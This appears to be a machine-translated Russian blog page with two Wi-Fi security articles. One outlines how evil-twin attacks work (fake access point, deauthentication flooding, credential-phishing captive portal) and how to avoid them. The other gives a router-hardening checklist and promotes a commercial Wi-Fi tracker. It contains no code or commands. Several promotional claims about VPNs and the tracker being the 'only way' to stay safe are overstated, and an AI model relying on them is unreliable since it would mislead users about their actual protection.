Киберпреступники обычно проводят атаку злого близнеца, чтобы обманным путем собрать данные аутентификации сети Wi-Fi.Получив учетные данные администратора для точки доступа, они могут легко читать, просматривать или изменять каждый незашифрованный трафик данных в своих интересах. Итак, чтобы получить такой доступ, они обычно создают то, что мы называем «скрытым порталом».

Если вы когда-либо пользовались Интернетом в аэропорту или ресторане, вы, должно быть, попали на специальный портал. Это экран с большим количеством информации, которую никто не беспокоит.

На этом же экране пользователей обычно просят добавить конкретную информацию, и они обычно делают это без труда, потому что это обычное дело.Но если киберпреступники создали перехватывающий портал, пользователи неосознанно подключили их к сети.

Итак, чтобы легко получить этот доступ, киберпреступники на этих этапах совершают атаку злого близнеца.

Шаг 1. Создание поддельной точки доступа

Киберпреступники, стоящие за атакой злого близнеца, начнут с установки поддельной точки доступа Wi-Fi с именем своей целевой сети. Для этого они могут использовать свой собственный WiFi-роутер и использовать сетевую карту на своем компьютере или даже использовать ананас WiFi для большей дальности.

Шаг 2. Наводнение сети

После создания точки доступа им нужно будет столкнуть пользователей с законных точек доступа и превратить их в смертоносные. Для этого они усложнят пользователям подключение к сети, переполнив ее «пакетами деаутентификации». Как только они это сделают, будет легко вытолкнуть несколько устройств, уже подключенных к сети. Когда пользователи замечают, что больше не могут получить доступ к определенной сети, они быстро открывают меню сети, чтобы найти работающую сеть.

Сетевое меню будет содержать список сетей, в том числе конкретную с тем же именем, что и неисправная. Но многие пользователи не считают такую ​​репликацию подозрительной или вредной. Вместо этого они могут связать это с проблемами с подключением и подключиться к нему, даже не подозревая, что они только что попали на территорию хакеров.

Шаг 3. Перенаправление пользователя

Теперь, когда ничего не подозревающие пользователи по незнанию подключились к вредоносной сети, они будут перенаправлены на поддельный перехватывающий портал.На экране обычно содержится много технических предложений, но пользователей просят предоставить учетные данные для входа в сеть Wi-Fi. Как только пользователи добавят данные для входа в систему, у хакеров есть все, что они хотят, чтобы манипулировать всем в сети.

Как определить атаки злых близнецов?

Мы должны сказать, что самый простой способ идентифицировать атаку злого близнеца — это использовать инструменты сниффинга, такие как Kismet или WiGLE WiFi. Однако обычному пользователю обычно сложно отличить фальшивую сеть от реальной.

Некоторые из причин этого включают:

  • Многие устройства, которые мы используем для подключения к общедоступным сетям, не имеют инструментов сниффинга для разделения этих сетей.
  • Использование одного и того же имени идентификатора набора услуг (SSID) затрудняет для вас и ваших устройств определение того, что сеть является поддельной.
  • Злоумышленники реплицируют MAC-адреса популярных и надежных сетей для дальнейшего обмана пользователей.
  • Злоумышленники-близнецы обычно не должны находиться близко к своей целевой сети, чтобы взломать ее.
  • Иногда их сеть обычно предлагает более сильный сигнал, чем законная сеть.

Как защититься от злых двойных атак

Многие люди не могут обнаружить нападение из-за изощренных выходок преступников. Итак, если вы хотите защитить себя от таких атак, сделайте следующее:

1. Беречь от общедоступных сетей Wi-Fi

Обычно легко стать жертвой этих хищников, если вы являетесь активным пользователем публичной сети.Мы не можем полностью запретить вам пользоваться бесплатным Интернетом в вашем сообществе, но если вам нужно, постарайтесь быть осторожными при их использовании.

Незащищенное соединение Wi-Fi может привести к непоправимым потерям, намного превышающим те, которые вы бы потратили на защищенную сеть. Поэтому, если вы можете, не используйте бесплатную сеть без каких-либо ограничений входа в систему, особенно если она имеет то же имя, что и защищенная сеть.

2. Проверка предупреждений

Каждый раз, когда вы пытаетесь подключиться к сети, и ваши устройства начинают предупреждать вас о чем-то подозрительном, проверьте это.Многие пользователи не беспокоят, и обычно это плохо кончается. Поэтому вместо того, чтобы игнорировать эти, казалось бы, раздражающие предупреждения, обратите внимание, потому что ваше устройство пытается защитить вас от хакера.

3. Отключите функцию автоматического подключения на своих устройствах

Не позволяйте своим устройствам подталкивать вас в ожидающие руки злобных атакующих близнецов, легко подключаясь к каждому открытому Wi-Fi. Вместо этого отключите эту функцию и дайте устройству запросить разрешение перед подключением. Таким образом, вы можете проверить сеть и одобрить или отклонить.

4. Ограничьте свою активность

Допустим, у вас мало времени, и вам нужно использовать общедоступную сеть Wi-Fi; убедитесь, что вы не входите в свои конфиденциальные учетные записи. Нам не нужно сообщать вам, что ваши финансовые данные, такие как банковские реквизиты, данные кредитной карты, номер социального страхования и т. Д., Не должны отображаться в незащищенной сети. Поэтому, пожалуйста, не используйте его в таких сетях.

5. Всегда используйте VPN

Судя по всему, обычным пользователям сложно идентифицировать клонированную точку доступа.Вот почему многие люди стали жертвами злых двойных атак. Иногда вы также можете быть слишком заняты, чтобы думать о легитимности конкретной сети при ее использовании. Вот почему VPN — лучшее, что может упростить вам жизнь.

VPN защищает вашу личность и шифрует ваши данные в Интернете независимо от того, какую сеть вы используете. Сервис настолько эффективен, что даже злоумышленники не могут получить доступ к любой информации, которую вы вводите в Интернете. Даже если они украдут ваши данные, они будут совершенно бесполезны, потому что они не смогут их расшифровать.

Но помните, что не все виртуальные частные сети надежны. Если вы решите использовать бесплатные сервисы, вы уже почти скомпрометированы. Поэтому убедитесь, что вы подписаны на безопасную услугу VPN с серверами по всему миру и используете протоколы шифрования военного уровня. Это единственный способ быть уверенным в своей конфиденциальности и безопасности.

Последние слова об атаках злых близнецов

Атаки злых близнецов — опасная и распространенная форма кибератак, которые могут затронуть кого угодно, особенно в незащищенных сетях.Пока вы пользуетесь Интернетом, вы подвержены любым злым умыслам.

Но если вы хотите быть свободным от всего этого, по возможности избегайте общедоступных сетей. Кроме того, попробуйте проверить свои связи, прежде чем что-либо с ними делать. Наконец, независимо от того, насколько вы заняты, на всякий случай проверяйте предупреждения на своих устройствах.

Наконец, используйте надежный VPN-сервис, чтобы скрыть свои данные от злоумышленников-близнецов. Независимо от того, что они пробуют в этих общедоступных сетях Wi-Fi, они не смогут прикоснуться к вам, даже если вы ими воспользуетесь.

Рекомендуемое изображение: Shutterstock

Просмотры сообщений: 1,463


Взлом

WiFi, часть 2 — как мне обезопасить свой Wi-Fi и защитить свой бизнес?

Это руководство по взлому Wi-Fi и безопасности является продолжением Части 1 — Введение в взлом WiFi и распространенные атаки.

Контрольный список базовой безопасности WiFi

Вот несколько недорогих способов защитить свой дом и бизнес, реализовав базовую безопасность на точках доступа WiFi и устройствах, использующих Wi-Fi:

Маршрутизатор или точка доступа WiFi Security

  1. Set надежный пароль WPA2 на вашем роутере.Мы предлагаем как минимум 12 символов (не из словаря), однако рекомендуется использовать более длинные пароли или контрольные фразы. Более длинные и сложные пароли снизят риск взлома пароля до незначительного уровня.
  2. Включите «Шифрование кадров управления», если у вашего маршрутизатора есть такая возможность. Это предотвратит атаки деаутентификации (объяснения см. В блоге за прошлый месяц).
  3. Обновите прошивку роутера до последней версии.
  4. Активируйте ограничения MAC-адресов в вашем маршрутизаторе, чтобы ограничить подключения только к доверенным устройствам, e.г. авторизованные телефоны и ноутбуки и т. д.
  5. Отключить WPS и UPnP. Это не позволит хакерам использовать слабые места в этих функциях, чтобы открыть уязвимости для атаки.
  6. Измените учетные данные администратора маршрутизатора по умолчанию на свой собственный идентификатор пользователя и пароль.
  7. Отключить удаленное администрирование и администрирование через WiFi для маршрутизатора (только для внутренней фиксированной сети).
  8. Скрыть свой SSID (идентификатор WiFi). Это может быть не лучшим вариантом для гостей, поскольку они не смогут видеть вашу сеть для подключения и потребуют предоставления им конкретных сведений.
  9. Используйте межсетевой экран маршрутизатора, чтобы ограничить доступ к минимальному количеству требуемых служб (портов) и IP-адресов.
  10. Уменьшите радиус действия Wi-Fi на маршрутизаторе до минимально возможного без нарушения нормальной работы.
  11. Выключайте беспроводной маршрутизатор, когда он не требуется, например, когда ваш офис закрыт на ночь или по выходным. Это можно запланировать в устройстве или настроить с помощью простого таймера розетки.
  12. Избегайте открытого обмена учетными данными для доступа к Wi-Fi — не вывешивайте их на стене, чтобы все могли видеть!

Безопасность устройств WiFi — телефон, ноутбук, планшет, часы и т. Д.

  1. Отключите Wi-Fi на своем устройстве и включайте его только при подключении к известной надежной точке доступа.
  2. Избегайте автоматических подключений при настройке нового Wi-Fi-соединения или, по крайней мере, удалите автоматические подключения для точек доступа, которые вы не используете регулярно.
  3. По возможности используйте VPN при доступе к Интернету через ненадежные соединения.
  4. Никогда не вводите и не просматривайте конфиденциальную информацию на веб-сайтах, не поддерживающих шифрование (HTTPS) (символ замка в вашем браузере).
  5. Никогда не подключайтесь к открытой сети Wi-Fi (пароль не требуется), если вы не управляете риском.
  6. Убедитесь, что все конечные точки сервера внутренней сети, такие как принтеры, имеют шифрованную (HTTPS) связь.

Что делать, если я подозреваю, что на меня уже напали?

Приведенный выше контрольный список не обеспечивает абсолютной защиты, но это хорошее начало, чтобы затруднить доступ злоумышленникам к вашему Wi-Fi. Считайте это рекомендуемым минимумом, который предотвратит успешное выполнение многих низкоуровневых атак.

Если вы подозреваете, что ваши сети Wi-Fi уже были взломаны, или могут быть атакованы или взломаны, то единственный способ остановить это — физически найти несанкционированные устройства и удалить их.

Давайте повторим: only способ остановить неавторизованный WiFi от атаки или взлома вашей сети — это физически найти и удалить .

Для этого вам понадобится специальное оборудование, например портативный WiFi-трекер HackHunter Pursuit (на фото).

Это легкое портативное устройство обнаруживает неавторизованный Wi-Fi в вашей среде и определяет местонахождение источника с точностью до нескольких сантиметров, чтобы его можно было удалить.

Заключение

Взлом Wi-Fi представляет собой риск для всех предприятий, и выполнение приведенного выше контрольного списка повысит вашу безопасность. Однако в WiFi все еще есть недостатки, которые делают его уязвимым для атак. Единственный способ быть уверенным в безопасности вашей сети Wi-Fi — это использовать трекер WiFi для обнаружения и удаления несанкционированных устройств.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *